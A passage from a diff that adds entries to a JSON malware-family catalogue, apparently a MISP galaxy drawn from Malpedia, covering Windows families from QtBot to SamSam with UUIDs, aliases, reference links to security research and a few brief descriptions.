"https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" + ] + }, + "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", + "value": "QtBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", + "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", + "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", + "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground" + ] + }, + "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", + "value": "Quant Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://github.com/quasar/QuasarRAT/tree/master/Client", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", + "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://twitter.com/malwrhunterteam/status/789153556255342596", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "05252643-093b-4070-b62f-d5836683a9fa", + "value": "Quasar RAT", + "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", + "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" + ] + }, + "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", + "value": "r980", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", + "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" + ] + }, + "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", + "value": "Radamant", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", + "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" + ] + }, + "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", + "value": "RadRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "brebsd" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", + "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" + ] + }, + "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", + "value": "Rambo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" + ] + }, + "uuid": "51f53823-d289-4176-af45-3fca7eda824b", + "value": "Ramdo", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nimnul" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", + "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", + "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", + "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", + "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", + "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", + "https://research.checkpoint.com/ramnits-network-proxy-servers/" + ] + }, + "uuid": "542161c0-47a4-4297-baca-5ed98386d228", + "value": "Ramnit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", + "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/", + "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", + "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", + "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/" + ] + }, + "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", + "value": "Ranbyus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", + "http://blog.talosintel.com/2016/07/ranscam.html" + ] + }, + "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", + "value": "Ranscam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", + "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" + ] + }, + "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", + "value": "Ransoc", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WinLock" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2", + "https://forum.malekal.com/viewtopic.php?t=36485&start=" + ] + }, + "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", + "value": "Ransomlock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", + "https://twitter.com/malwrhunterteam/status/977275481765613569", + "https://twitter.com/malwrhunterteam/status/997748495888076800" + ] + }, + "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", + "value": "Rapid Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", + "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" + ] + }, + "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", + "value": "RapidStealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + ] + }, + "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", + "value": "rarstar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "http://blog.trex.re.kr/3" + ] + }, + "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", + "value": "RatabankaPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", + "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" + ] + }, + "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", + "value": "RawPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Remote Control System", + "Crisis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", + "https://www.f-secure.com/documents/996508/1030745/callisto-group", + "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" + ] + }, + "uuid": "c359c74e-4155-4e66-a344-b56947f75119", + "value": "RCS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", + "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" + ] + }, + "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", + "value": "rdasrv", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", + "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", + "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", + "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under" + ] + }, + "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", + "value": "ReactorBot", + "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + ] + }, + "uuid": "826c31ca-2617-47e4-b236-205da3881182", + "value": "Reaver", + "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", + "https://www.recordedfuture.com/redalpha-cyber-campaigns/" + ] + }, + "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", + "value": "RedAlpha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", + "http://blog.macnica.net/blog/2017/12/post-8c22.html", + "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", + "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" + ] + }, + "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", + "value": "RedLeaves", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", + "https://twitter.com/JaromirHorejsi/status/816237293073797121" + ] + }, + "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", + "value": "Red Alert", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", + "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" + ] + }, + "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", + "value": "Red Gambler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", + "https://sensepost.com/discover/tools/reGeorg/", + "https://github.com/sensepost/reGeorg" + ] + }, + "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", + "value": "reGeorg", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", + "https://www.youtube.com/watch?v=jeLd-gw2bWo" + ] + }, + "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", + "value": "Regin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", + "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "http://malware-traffic-analysis.net/2017/12/22/index.html", + "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", + "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", + "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", + "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", + "https://secrary.com/ReversingMalware/RemcosRAT/" + ] + }, + "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", + "value": "Remcos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", + "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions" + ] + }, + "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", + "value": "Remexi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" + ] + }, + "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", + "value": "Remsec", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" + ] + }, + "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", + "value": "Remy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", + "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" + ] + }, + "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", + "value": "Rerdom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", + "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" + ] + }, + "uuid": "42fa55e3-e708-4c11-b807-f31573639941", + "value": "Retadup", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Tsukuba", + "Werdlod" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", + "https://www.govcert.admin.ch/blog/33/the-retefe-saga", + "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", + "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", + "https://github.com/cocaman/retefe" + ] + }, + "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", + "value": "Retefe", + "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic." + }, + { + "meta": { + "synonyms": [ + "Revetrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", + "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/", + "https://isc.sans.edu/diary/rss/22590", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", + "value": "Revenge RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + ] + }, + "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", + "value": "RGDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", + "value": "Rikamanu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux" + ] + }, + "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", + "value": "Rincux", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", + "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" + ] + }, + "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", + "value": "Ripper ATM", + "description": "" + }, + { + "meta": { + "synonyms": [ + "yellowalbatross" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", + "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" + ] + }, + "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", + "value": "rock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", + "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" + ] + }, + "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", + "value": "Rockloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" + ] + }, + "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", + "value": "Rofin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" + ] + }, + "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", + "value": "Rokku", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", + "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", + "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", + "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", + "https://www.youtube.com/watch?v=uoBQE5s2ba4" + ] + }, + "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", + "value": "RokRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CarbonGrabber" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", + "http://blogs.cisco.com/security/talos/rombertik" + ] + }, + "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", + "value": "Rombertik", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" + ] + }, + "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", + "value": "Romeo(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" + ] + }, + "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", + "value": "Roopirs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" + ] + }, + "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", + "value": "Roseam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", + "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" + ] + }, + "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", + "value": "Rover", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Mayachok", + "Cidox", + "BkLoader" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", + "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", + "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", + "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", + "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", + "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", + "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", + "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" + ] + }, + "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", + "value": "Rovnix", + "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least)." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", + "value": "RoyalCli", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", + "value": "Royal DNS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", + "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" + ] + }, + "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", + "value": "Rozena", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", + "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" + ] + }, + "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", + "value": "RTM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", + "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" + ] + }, + "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", + "value": "rtpos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" + ] + }, + "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", + "value": "Ruckguv", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" + ] + }, + "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", + "value": "Rumish", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", + "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + ] + }, + "uuid": "b746a645-5974-44db-a811-a024214b7fba", + "value": "running_rat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "RCSU" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", + "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" + ] + }, + "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", + "value": "Rurktar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", + "https://www.secureworks.com/blog/research-21041", + "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", + "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", + "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", + "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/", + "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", + "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", + "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/" + ] + }, + "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", + "value": "Rustock", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Saga" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", + "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", + "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", + "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", + "http://malware-traffic-analysis.net/2017/10/13/index.html" + ] + }, + "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", + "value": "SAGE", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Sakurel" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", + "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", + "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", + "https://www.secureworks.com/research/sakula-malware-family" + ] + }, + "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", + "value": "Sakula RAT", + "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", + "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" + ] + }, + "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", + "value": "Salgorea", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" + ] + }, + "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", + "value": "Sality", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", + "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", + "http://blog.talosintel.com/2016/03/samsam-ransomware.html", + "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", + "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/" + ] + }, + "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", + "value": "SamSam", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Daws" + ], + "type": [], + "refs": 